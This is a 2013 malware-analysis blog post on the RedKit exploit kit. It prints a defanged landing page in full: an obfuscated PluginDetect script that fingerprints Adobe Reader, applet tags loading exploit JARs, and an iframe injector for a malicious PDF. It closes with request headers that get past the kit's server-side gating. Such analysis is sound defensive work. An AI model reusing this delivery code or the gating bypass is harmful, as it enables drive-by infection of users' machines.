Having covered the Blackhole Exploit Kit recently, I thought it would be a good idea to look more closely at the RedKit EK.
A good source of malicious URLs, as always, is urlquery.net or malwaredomainlist.com.
Today's pick came from urlquery: some poor Madonna fans having a bad day!
I looked through the output and immediately found two iframes that caught my attention:
hxxp: //miamiheattickets.com/http.php hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177
0. Fetch the web pages
The second page looks especially interesting, as it has the distinct pattern of a RedKit URL.
--2013-03-10 19:48:19-- hxxp: //miamiheattickets.com/http.php
Resolving miamiheattickets.com... 174.120.81.158
Connecting to miamiheattickets.com|174.120.81.158|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 404 Not Found
Date: Sun, 10 Mar 2013 18:49:15 GMT
Server: Apache
Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
2013-03-10 19:48:21 ERROR 404: Not Found.
--2013-03-10 19:49:28-- hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177
Resolving tucsonaccidentattorney.net... 67.18.140.14
Connecting to tucsonaccidentattorney.net|67.18.140.14|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 301 Moved Permanently
Date: Sun, 10 Mar 2013 18:50:24 GMT
Server: Apache
Location: hxxp: //fgccnc.org/mhed.htm?j=449177
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
Location: hxxp: //fgccnc.org/mhed.htm?j=449177 [following]
--2013-03-10 19:49:30-- hxxp: //fgccnc.org/mhed.htm?j=449177
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 18:50:26 GMT
Server: Apache
Content-Length: 12956
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
Length: 12956 (13K) [text/html]
Saving to: `pane2.html'
0K .......... .. 100% 205M=0s
2013-03-10 19:49:33 (205 MB/s) - `pane2.html' saved [12956/12956]
Excellent :) got a hit on the second page. Note that the first URL simply 404s, while the second one 301-redirects from tucsonaccidentattorney.net to fgccnc.org, which is the host that actually serves the landing page (and, as we will see, the exploit files).
1. PluginDetect 0.7.7 — the landing page embeds a copy of the PluginDetect library (version string at the top of the object) with the object renamed to dtYWu.
<html>
<script>
// Obfuscated copy of the PluginDetect library (see the version string below), renamed to dtYWu.
// The exploit kit uses it to fingerprint the browser and the installed Adobe Reader version
// before deciding whether to load the PDF exploit (see the script at the bottom of the page).
var dtYWu = {
// Library metadata (upstream version string and release date).
version: "0.7.7",
rDate: "04/11/2012",
name: "diction",
// handler: returns a closure that later invokes c(b, a); used to bind runWLfuncs to the load event.
handler: function (c, b, a) {
return function () {
c(b, a)
}
},
// Small type predicates used throughout the object.
isDefined: function (b) {
return typeof b != "undefined"
},
isArray: function (b) {
return (/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function (b) {
return typeof b == "function"
},
isString: function (b) {
return typeof b == "string"
},
isNum: function (b) {
return typeof b == "number"
},
// isStrNum: a string that contains at least one digit (a version-like string).
isStrNum: function (b) {
return (typeof b == "string" && (/\d/).test(b))
},
// getNumRegx: first run of digits with dot/underscore/comma/dash separators (a version number).
getNumRegx: /[\d][\d\.\_,-]*/,
// splitNumRegx: separators used between version components.
splitNumRegx: /[\.\_,-]/g,
// getNum: extract the first version-like substring of b, using regex c when given.
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
},
// compareNums: component-wise numeric comparison of two version strings.
// Returns 1 if h > f, -1 if h < f, 0 otherwise (also 0 when either is not a version string).
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)) {
if (e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length); a++) {
if (g(c[a], 10) > g(b[a], 10)) {
return 1
}
if (g(c[a], 10) < g(b[a], 10)) {
return -1
}
}
}
return 0
},
// formatNum: normalise a version string to exactly four comma-separated components,
// stripping leading zeros and padding with "0". c = number of significant components (default 4);
// components beyond c are zeroed. Returns null for non-version input.
formatNum: function (b, c) {
var d = this,
a, e;
if (!d.isStrNum(b)) {
return null
}
if (!d.isNum(c)) {
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a++) {
if (/^(0+)(.+)$/.test(e[a])) {
// Relies on the legacy static RegExp.$2 left by the preceding test().
e[a] = RegExp.$2
}
if (a > c || !(/\d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
// Properties prefixed with "$$" are factories: convertFuncs() later replaces each one with
// the function it returns, closed over the root object (so hasMimeType(c) becomes available).
// hasMimeType: on non-IE browsers, return the navigator.mimeTypes entry for the first of the
// given type(s) that has an enabled plugin; null otherwise.
$$hasMimeType: function (a) {
return function (c) {
if (!a.isIE && c) {
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b++) {
if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)) {
return f
}
}
}
}
return null
}
},
// findNavPlugin: scan navigator.plugins for a name or description matching l (case-insensitive),
// optionally requiring a digit in the surrounding text (e, default on) and excluding matches of c.
// Depends on the legacy static RegExp.leftContext/rightContext set by the immediately preceding test().
findNavPlugin: function (l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? /\d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for (f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if (!k || !(k.test(m) || k.test(b))) {
return a[f]
}
}
}
return null
},
// getMimeEnabledPlugin: like findNavPlugin but keyed on MIME type(s) k; returns the enabled
// plugin whose name/description matches m (and does not match c), else 0.
getMimeEnabledPlugin: function (k, m, c) {
var e = this,
f, b = new RegExp(m, "i"),
h = "",
g = c ? new RegExp(c, "i") : 0,
a, l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d++) {
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)) {
if (!g || !(g.test(l) || g.test(a))) {
return f
}
}
}
}
return 0
},
// getPluginFileVersion: reconcile the plugin object's own "version" property with the version b
// derived from its description. Only used when OS code <= 2 (Win/Mac, see initScript); returns
// the more precise of the two when they agree on their leading components, else b.
getPluginFileVersion: function (f, b) {
var h = this,
e, d, g, a, c = -1;
if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if (!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a++) {
if (c > -1 && a > c && d[a] != "0") {
return b
}
if (g[a] != d[a]) {
if (c == -1) {
c = a
}
if (d[a] != "0") {
return b
}
}
}
return e
},
// AXO: reference to window.ActiveXObject (undefined outside IE).
AXO: window.ActiveXObject,
// getAXO: instantiate the ActiveX control with progID a; any failure is swallowed and null returned.
getAXO: function (a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
} catch (d) {}
return f
},
// convertFuncs: for every "$$name" property of f, set f.name = f.$$name(f) and delete the factory.
convertFuncs: function (f) {
var a, g, d, b = /^[$][$]/,
c = this;
for (a in f) {
if (b.test(a)) {
try {
g = a.slice(2);
if (g.length > 0 && !f[g]) {
f[g] = f[a](f);
delete f[a]
}
} catch (d) {}
}
}
},
// initObj: write the key/value pairs in b onto e (when e[b[0]] == 1 or forced by d) and recurse
// into child objects flagged with b[0] == 1. Used to give every plugin object a "$" back-reference.
initObj: function (e, b, d) {
var a, c;
if (e) {
if (e[b[0]] == 1 || d) {
for (a = 0; a < b.length; a = a + 2) {
e[b[a]] = b[a + 1]
}
}
for (a in e) {
c = e[a];
if (c && c[b[0]] == 1) {
this.initObj(c, b)
}
}
}
},
// initScript: one-time setup. Parses navigator.platform into an OS code, detects the browser
// family/version from the user agent, probes ActiveX availability on IE, and registers a
// window "load" handler that runs the queued detection callbacks. Called explicitly by the
// landing page (dtYWu.initScript()).
initScript: function () {
var c = this,
a = navigator,
e = "/",
f, i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins) {
if (c.Plugins[f]) {
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
};
// OS codes: 1 Win, 2 Mac, 3 Linux, 4 FreeBSD, 21.x iOS devices, 22.x Windows CE/Mobile, 100 unknown.
// Matched from the most specific pattern backwards so "Win.*CE" wins over "Win".
c.OS = 100;
if (b) {
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
for (f = d.length - 2; f >= 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
// IE detection via JScript conditional compilation: the generated source is
// "return /*@cc_on!@*/false", which evaluates to !false only in IE's JScript engine.
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
// parseFloat takes a single argument; the trailing 10 here is ignored.
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
// Probe a list of common progIDs; ActiveX is considered enabled if any one instantiates.
if (c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f++) {
if (c.getAXO(j[f])) {
c.ActiveXEnabled = true;
break
}
}
}
// Browser family/version detection from the user agent (relies on RegExp.$1 after each test()).
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
},
// init: resolve a plugin name to its entry in Plugins. The name is lowercased and stripped of
// whitespace ("AdobeReader" -> "adobereader"). A single-character argument instead sets the
// version delimiter. Returns {status, plugin}: status -3 unknown plugin, -2 IE without ActiveX
// (except "java"), 1 ok.
init: function (d) {
var c = this,
b, d, a = {
status: -3,
plugin: 0
};
if (!c.isString(d)) {
return a
}
if (d.length == 1) {
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b || !b.getVersion) {
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)) {
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE && !c.ActiveXEnabled && d !== "java") {
a.status = -2;
return a
}
a.status = 1;
return a
},
// fPush: append callback b (a function, or an array whose first element is a function) to queue a.
fPush: function (b, a) {
var c = this;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
a.push(b)
}
},
// callArray: run each queued callback once, nulling it afterwards; stops at the first null entry.
callArray: function (b) {
var c = this,
a;
if (c.isArray(b)) {
for (a = 0; a < b.length; a++) {
if (b[a] === null) {
return
}
c.call(b[a]);
b[a] = null
}
}
},
// call: invoke c(this) or, for array form, c[0](this, c[1], c[2], c[3]).
call: function (c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if (a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if (b.isFunc(c)) {
c(b)
}
}
},
// Separator used in the string returned by getVersion (the landing page splits on ',').
getVersionDelimiter: ",",
// getVersion(name, d, c): public entry point. Runs the plugin's getVersion once and returns its
// version with separators replaced by getVersionDelimiter, or null when the plugin is unknown
// or cannot be queried.
$$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h = {};
if (e.status < 0) {
return null
};
f = e.plugin;
if (f.getVersionDone != 1) {
f.getVersion(null, d, c);
if (f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
},
// cleanup: intentionally a no-op in this build.
cleanup: function () {},
// addWinEvent: attach c to window event d via addEventListener, attachEvent, or the on* property.
addWinEvent: function (d, c) {
var e = this,
a = window,
b;
if (e.isFunc(c)) {
if (a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if (a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
},
// winHandler: chain d in front of an existing on* handler c.
winHandler: function (d, c) {
return function () {
d();
if (typeof c == "function") {
c()
}
}
},
// Callback queues run on window load (WLfuncs0 first, then WLfuncs).
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function (a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
},
winLoaded: false,
// onWindowLoaded(b): run b now if the load event already fired, else queue it.
$$onWindowLoaded: function (a) {
return function (b) {
if (a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
},
// Hidden container div used to host 1x1 plugin tags for detection.
div: null,
divID: "plugindetect",
divWidth: 50,
pluginSize: 1,
// emptyDiv: remove all inserted detection elements and the container div itself.
emptyDiv: function () {
var d = this,
b, h, c, a, f, g;
if (d.div && d.div.childNodes) {
for (b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if (c && c.childNodes) {
for (h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch (f) {}
}
}
if (c) {
try {
d.div.removeChild(c)
} catch (f) {}
}
}
}
if (!d.div) {
a = document.getElementById(d.divID);
if (a) {
d.div = a
}
}
if (d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch (f) {}
d.div = null
}
},
DONEfuncs: [],
// onDoneEmptyDiv: once the page has loaded and no plugin object still has pending work,
// run the DONE callbacks and tear down the detection div.
onDoneEmptyDiv: function () {
var c = this,
a, b;
if (!c.winLoaded) {
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for (a in c) {
b = c[a];
if (b && b.funcs) {
if (b.OTF == 3) {
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a++) {
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
},
// getWidth: rendered width of element c, or -1 if unavailable.
getWidth: function (c) {
if (c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if (b.isNum(a)) {
return a
}
}
return -1
},
// getTagStatus: infer whether an inserted plugin tag m rendered, by comparing its span width
// against reference spans g (empty) and a (text). Returns -2 missing spans, -1 not rendered,
// 1 rendered, 0 undetermined / still waiting (b is a retry counter).
getTagStatus: function (m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.span,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if (!k || !h || !d || !c.getDOMobj(m)) {
return -2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
}
if (l >= i) {
return -1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if (!m.winLoaded && c.winLoaded) {
return 1
}
if (m.winLoaded && c.isNum(b)) {
if (!c.isNum(m.count)) {
m.count = b
}
if (b - m.count >= 10) {
return 1
}
}
}
} catch (f) {}
return 0
},
// getDOMobj: the inserted plugin element (first child of g.span), optionally focusing the div.
getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if (b && a) {
d.div.focus()
}
} catch (f) {}
return b ? c.firstChild : null
},
// setStyle: apply [prop, value, prop, value, ...] pairs to b.style, ignoring failures.
setStyle: function (b, g) {
var f = b.style,
a, d, c = this;
if (f && g) {
for (a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch (d) {}
}
}
},
// insertDivInBody: prepend a to the document body (top window's body when i is set); if the body
// does not exist yet, document.write a temporary div to force its creation, then remove it.
insertDivInBody: function (a, i) {
var h, f = this,
b = "pd33993399",
d = null,
j = i ? window.top.document : window.document,
c = "<",
g = (j.getElementsByTagName("body")[0] || j.body);
if (!g) {
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
} catch (h) {}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g) {
if (g.firstChild && f.isDefined(g.insertBefore)) {
g.insertBefore(a, g.firstChild)
} else {
g.appendChild(a)
}
if (d) {
g.removeChild(d)
}
} else {}
},
// insertHTML: build a 1x1 <g> tag (e.g. "object") with attributes b and <param> children h,
// place it in a span inside the hidden detection div, and return {span, winLoaded, tagName, outerHTML}.
// Uses innerHTML with values taken from this object's own Plugins table, not from external input.
insertHTML: function (g, b, h, a, l) {
var m, n = document,
k = this,
q, p = n.createElement("span"),
o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)) {
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)) {
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2) {
if (/[^\s]/.test(b[o + 1])) {
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2) {
if (/[^\s]/.test(h[o + 1])) {
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
} else {
q = a
}
if (!k.div) {
j = n.getElementById(k.divID);
if (j) {
k.div = j
} else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if (!j) {
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode) {
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
} catch (m) {};
try {
k.div.appendChild(p)
} catch (m) {};
return {
span: p,
winLoaded: k.winLoaded,
tagName: g,
outerHTML: q
}
}
return {
span: null,
winLoaded: k.winLoaded,
tagName: "",
outerHTML: q
}
},
// Plugin table. This build only carries the Adobe Reader detector — the one the landing page
// needs to decide whether to load the PDF exploit.
Plugins: {
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
// IE-side identifiers: ActiveX progIDs and the Acrobat control class ID.
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
// Cache of installed-status per MIME type queried.
INSTALLED: {},
// pluginHasMimeType: 1 if plugin object d lists MIME type c, or a matching enabled plugin exists.
pluginHasMimeType: function (d, c, f) {
var b = this,
e = b.$,
a;
for (a in d) {
if (d[a] && d[a].type && d[a].type == c) {
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)) {
return 1
}
return 0
},
// getVersion: populate this.installed (1 found, 0 present-but-no-version, -0.2/-1 not found)
// and this.version (four-component string from formatNum). j optionally overrides the MIME type.
getVersion: function (l, j) {
var g = this,
d = g.$,
i, f, m, n, b = null,
h = null,
k = g.mimeType,
a, c;
if (d.isString(j)) {
j = j.replace(/\s/g, "");
if (j) {
k = j
}
} else {
j = null
}
if (d.isDefined(g.INSTALLED[k])) {
g.installed = g.INSTALLED[k];
return
}
// Non-IE: look up the Reader plugin by MIME type / name; on Windows, fall back to inferring
// major version 9 or 8 from the extra MIME types those releases register.
if (!d.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0) {
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j) {
n = b
}
if (!b && d.hasMimeType(g.mimeType)) {
b = d.findNavPlugin(a, 0)
}
if (b) {
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1) {
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
h = "9"
} else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
h = "8"
}
}
}
}
} else {
h = g.version
}
if (!d.isDefined(n)) {
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
} else {
// IE: instantiate the Acrobat ActiveX control (or insert an <object> with its classid) and
// parse the highest "name=version" entry out of GetVersions(). Errors are swallowed.
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
for (m = 0; m < 5; m++) {
if (c.test(f) && (!h || RegExp.$1 > h)) {
h = RegExp.$1
}
}
} catch (i) {}
g.installed = h ? 1 : (b ? 0 : -1)
}
if (!g.version) {
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
},
// Trailing dummy property.
zz: 0
}
};
</script>
<body>
<script>
// Two Java applets are written into the page unconditionally — unlike the PDF below, no Java
// version check gates them. archive = exploit JAR on the same host as the landing page,
// code = applet entry class. The "elitken" parameter is an obfuscated string; presumably the
// applet decodes it to locate/decrypt the payload (not decoded in this post) — TODO confirm.
document.write('<applet archive="hxxp: //fgccnc.org/332.jar" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
// Second JAR: same structure, different archive name and parameter value.
document.write('<applet archive="hxxp: //fgccnc.org/887.jar" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
</script>
<script type="text/javascript">
// PDF exploit trigger. The attribute name "src" is assembled by concatenation, presumably to
// defeat naive string matching on the landing page.
var biiz = "s" + "r" + "c";
// Set to true by etract() when the detected Adobe Reader version looks vulnerable.
var makral = false;
// Injects a small (25x22) iframe pointing at the malicious PDF into the document body.
function tksmke() {
otrtorol.setAttribute("width", 25);
otrtorol.setAttribute("height", 22);
document.body.appendChild(otrtorol);
otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
}
// a = Adobe Reader major version, b = minor version (strings from the split below; == and <
// coerce them to numbers). Targets Reader 8.0-8.3 and 9.0-9.3; the post attributes the PDF
// to CVE-2010-0188.
function etract(a, b) {
if ((a == 8 && b < 4) || (a == 9 && b < 4)) makral = true;
}
// The iframe is created up front, with the tag name split ("ifra" + "me") for the same reason as "src".
var otrtorol = document.createElement("ifra" + "me");
// Initialise the embedded PluginDetect copy (browser / OS / ActiveX detection).
dtYWu.initScript();
// lite is unused. arwtawt is the comma-delimited version string from getVersion, or null
// when Reader is not detected — in which case nothing happens.
function ygutiy(lite, arwtawt) {
if (arwtawt) {
arwtawt = arwtawt.split(',');
etract(arwtawt[0], arwtawt[1]);
}
}
// Query the Reader version ("AdobeReader" is lowercased to the "adobereader" plugin entry).
ygutiy(1, dtYWu.getVersion("AdobeReader"));
// Runs at most once (makral is cleared inside the loop), so this is effectively an if.
while (makral) {
tksmke();
makral = false;
}
</script>
</body>
</html>
The most interesting part is the links to the exploit files:
document.write('<applet archive="hxxp: //fgccnc.org/332.j&#97;r" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
document.write('<applet archive="hxxp: //fgccnc.org/887.j&#97;r" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
</script>
<script type="text/javascript">
// Excerpt of the PDF trigger from the landing page above: "src" is built by concatenation,
// and tksmke() appends a 25x22 iframe loading the malicious PDF once makral is set.
var biiz = "s" + "r" + "c";
var makral = false;
function tksmke() {
otrtorol.setAttribute("width", 25);
otrtorol.setAttribute("height", 22);
document.body.appendChild(otrtorol);
otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
}
Two JARs and one PDF: 332.jar, 887.jar and 987.pdf. Note the difference in delivery: the two applets are written into the page unconditionally, whereas the PDF is only loaded into an iframe when PluginDetect reports Adobe Reader 8.x or 9.x with a minor version below 4 (the `etract` check above).
2. Fetch the exploit files — NOT
--2013-03-10 19:57:03-- hxxp: //fgccnc.org/332.jar Resolving fgccnc.org... 50.22.90.99 Connecting to fgccnc.org|50.22.90.99|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Sun, 10 Mar 2013 18:57:57 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 2013-03-10 19:57:05 ERROR 404: Not Found. --2013-03-10 19:58:32-- hxxp: //fgccnc.org/332.jar Resolving fgccnc.org... 50.22.90.99 Connecting to fgccnc.org|50.22.90.99|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Sun, 10 Mar 2013 18:59:26 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 2013-03-10 19:58:34 ERROR 404: Not Found. --2013-03-10 19:58:53-- hxxp: //fgccnc.org/332.jar Resolving fgccnc.org... 50.22.90.99 Connecting to fgccnc.org|50.22.90.99|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Sun, 10 Mar 2013 18:59:47 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 2013-03-10 19:58:56 ERROR 404: Not Found.
Nope! 404s all over my screen. Not so easy to pick this low-hanging fruit after all... The 404s are most likely server-side gating: the kit only serves the exploit files to requests whose headers look like a browser plugin fetching them, not to a plain wget — which the next step confirms.
Fortunately my Google-fu was with me and I found a great hint over at the Day by Day blog.
3. Header FU
Add these headers to the request:
content-type: application/x-java-archive
Accept: text/html, image/gif, *; q=.2, */*; q=.2
